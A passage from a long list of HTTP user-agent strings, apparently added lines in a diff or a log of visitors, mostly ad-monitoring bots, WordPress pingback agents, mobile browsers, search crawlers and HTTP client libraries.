tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624398594-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624377829-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624377838-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624392874-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624323321-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624329794-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624335453-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624355321-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624375240-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/91.0.4472.90 Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210622.142243 +WhatsApp/2.21.12.20 A +WordPress/4.9.18; https://www.xttijt.co +WordPress/5.7.2; https://bigliki.ru +WordPress/5.7.2; https://fossnettr.com +Snap URL Preview Service; bot; https://developers.snap.com/robots +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624407683-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624415525-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624448851-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624452106-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624460807-0 +DuckDuckGo%20Privacy%20Browser/0.7.1 CFNetwork/1128.1 Darwin/19.6.0 (x86_64) +Crawler-Boot-Armaara +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624458777-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624458779-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624410885-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624412582-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624417920-0 +WhatsApp/2.21.12.21 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624453927-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624458093-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624463211-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 5.0.2; SM-J727T1 ) U2/1.0.0 Mobile +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210622.142243 +Googlebot-Image +Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows) +GoogleStackdriverMonitoring-UptimeChecks(https://cloud.google.com/monitoring) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624494171-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624503594-0 +WordPress/5.7.2; http://englishs.mycafe24.com +WordPress/5.7.2; https://khareedo1192.000webhostapp.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624551824-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624557280-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624495370-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624506812-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624519475-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 5.0.2; GT-S5360 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 6.0; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 8.0.0; SM-C111 ) U2/1.0.0 Mobile +WordPress/5.7.2; https://precom-multimedia.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624508333-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624556263-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624556264-0 +GoogleAuth/1.4 (d1q QP1A.190711.020); gzip,gzip(gfe),gzip(gfe) +Snapchat/11.23.2.36 (5062Z; Android 11#2C5Y-0#30; gzip) V/MUSHROOM +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624580063-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624591458-0 +WhatsApp/2.21.13.15 A +WhatsApp/2.21.13.17 A +yacybot (/global; amd64 Linux 5.8.0-59-generic; java 1.8.0_191; Europe/en) http://yacy.net/bot.html +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624643720-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624649690-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624585413-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624595921-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624600163-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624600161-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624605614-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624616849-0 +GuzzleHttp/6.5.5 curl/7.61.1 PHP/7.1.30 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624636260-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624646808-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 5.1.2; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624646808-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624646807-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 6.0; SM-G600FY ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624646808-10 +WordPress/5.7.2; https://greyhatmarketing.com +libwww-perl/6.55 +TuneIn Radio/18.1 (Android 25; SM-P550; Java) +Mozilla/5.0 (compatible; special_archiver/3.4.0; +https://archive-it.org/files/site-owners-special.html) +GoogleAuth/1.4 (HWAGS-Q HUAWEIAGS-L09); gzip,gzip(gfe),gzip(gfe) +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.31.1.el7.x86_64 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624719738-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 9; SM-N910H ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624668139-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624677738-10 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 9; TECNO_LB8a ) U2/1.0.0 Mobile +WhatsApp/2.21.120.15 i +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 6.0; SM-J727T1 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624669458-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624679268-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 6.0.1; DLI-TL20 ) U2/1.0.0 Mobile +WordPress/5.1.10; http://www.grhd.com.br +WordPress/5.7.2; https://topservice66.ru +WordPress/5.7.2; https://sales.2shop247.club +WordPress/5.7.2; https://nextgendataguru.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624810132-0 +WordPress/5.7.2; https://www.furkanege.com.tr/blog +WordPress/5.7.2; https://askpythonquestions.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624770597-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624755306-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624763561-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624802350-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624806411-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624811247-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/91.0.4472.90 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +ArchiveTeam ArchiveBot/20210517.c1020e5 (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 +GoogleAuth/1.4 (GM9PRO_d_sprout PKQ1.180904.001); gzip,gzip(gfe),gzip(gfe +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624839257-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624848918-0 +WhatsApp/2.21.13.18 A +Java1.8.0_201 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624889047-0 +WordPress.com; https://niekdang.wordpress.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 7.0; IdeaTabA1000-G ) U2/1.0.0 Mobile +WordPress/5.7.2; https://cakrawalarafflesia.org +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/89.0.4389.82 Safari/537.36 Prerender (+https://github.com/prerender/prerender) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624900871-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624905940-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/610.1 (KHTML, like Gecko) JavaFX/16 Safari/610.1 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624842028-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624850087-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624851298-0 +WordPress/5.7.2; http://localhost/testsite +Tiny Tiny RSS/21.03-c0fba62fa (http://tt-rss.org/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624901825-0 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_31 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624926234-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624935719-0 +PycURL/7.43.0.5 libcurl/7.64.0 OpenSSL/1.1.1d zlib/1.2.11 libidn2/2.0.5 libpsl/0.20.2 (+libidn2/2.0.5) libssh2/1.8.0 nghttp2/1.36.0 librtmp/2.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624927489-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624937940-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624984531-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624998045-10 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 8.1.0; SM-J727T1 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624929466-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1624936746-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1624938737-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 OPR/76.0.4017.123 +WhatsApp/2.21.10.14 A +WordPress/5.7.2; https://www.tecdud.com +WhatsApp/2.2123.8 N +WhatsApp/2.21.14.2 A +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 7.1.2; SM-J701F ) U2/1.0.0 Mobile +WordPress/5.3.8; https://turbocomputer.ru +WordPress/5.7.2; https://avtokent74.ru +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 9; AS-5433_Secret ) U2/1.0.0 Mobile +Apache-HttpClient/4.5.8 (Java/11.0.4) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625012838-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625024104-0 +PostmanRuntime/7.28.1 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625063155-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625073693-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625063156-10 +WordPress/5.7.2; https://www.zvirotice.cz; verifying pingback from 192.40.220.138 +WordPress/5.6.1; https://www.tripnotision.com; verifying pingback from 196.240.57.36 +serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com) +WhatsApp/2.21.14.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625016912-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625020411-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625020424-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625028702-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625033102-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625048613-0 +WhatsApp/2.21.14.3 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210629.192842 +WordPress/4.9.15; https://blogged.thecityschool.edu.pk +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1625030065-0 +WordPress/5.7.2; https://www.memycameraandyou.com +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +okhttp/4.3.2-SNAPSHOT +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625099210-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625110095-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210630.153044 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210701.153807 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625162059-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625168628-0 +WordPress/5.7.2; https://furkanege.com.tr/blog +WordPress/4.9.18; https://blog.develoeper.com; verifying pingback from 113.73.30.25 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625100715-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625132219-10 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210701.144509 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625167656-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625102987-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625112890-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 TinEye/1.0 (via http://www.tineye.com/) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) 